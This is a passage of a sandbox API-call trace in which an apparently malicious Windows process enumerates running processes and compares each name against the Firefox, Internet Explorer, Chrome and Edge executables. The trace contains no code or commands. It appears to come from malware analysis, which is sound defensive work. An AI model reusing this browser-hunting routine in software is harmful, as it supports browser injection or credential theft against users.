[0213.866] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0213.866] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0213.866] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0213.866] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0213.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.867] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0213.867] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0213.867] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0213.867] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.868] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0213.868] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0213.868] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0213.868] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.868] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0213.868] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0213.868] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0213.868] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.869] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0213.869] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0213.869] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0213.869] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.869] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0213.870] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0213.870] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0213.870] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.870] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.870] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0213.870] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0213.870] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0213.870] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.870] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.871] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.871] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.871] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0213.871] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.871] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.872] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.872] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.873] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.873] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.873] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.873] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.873] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.873] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.873] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.874] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.874] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.874] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.875] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0213.875] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0213.875] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0213.875] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.875] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.875] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.875] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.875] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.875] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.875] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.876] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.876] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.876] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.876] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.876] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.876] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0213.876] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0213.876] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0213.876] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.877] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.877] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0213.877] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0213.877] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0213.877] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.877] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.878] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0213.878] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0213.878] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0213.878] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.878] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.878] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.878] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.878] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.878] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.878] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.879] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0213.879] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0213.879] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0213.879] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.879] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0213.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0213.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0213.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0213.879] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.879] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0213.880] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0213.880] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0213.880] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0213.880] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.880] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0213.880] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0213.881] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0213.881] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0213.881] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.881] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0213.881] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0213.881] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0213.881] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0213.881] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.881] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0213.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0213.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0213.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0213.882] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.882] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0213.882] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0213.882] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0213.882] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0213.882] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.882] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0213.883] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0213.883] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0213.883] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0213.883] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.883] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0213.883] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0213.883] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0213.883] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0213.883] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.883] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0213.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0213.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0213.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0213.884] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.884] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0213.884] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0213.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0213.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0213.885] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.885] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0213.885] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0213.885] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0213.885] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0213.885] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.885] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0213.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0213.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0213.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0213.886] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.886] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0213.886] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0213.886] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0213.886] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0213.886] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.886] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0213.887] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0213.887] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0213.887] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0213.887] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.887] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0213.887] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0213.887] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0213.887] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0213.887] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.887] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0213.888] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0213.888] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0213.888] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0213.888] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.888] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0213.889] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0213.889] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0213.889] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0213.889] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.889] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0213.889] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0213.889] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0213.889] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0213.889] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.889] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0213.890] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0213.890] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0213.890] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0213.890] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.890] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, 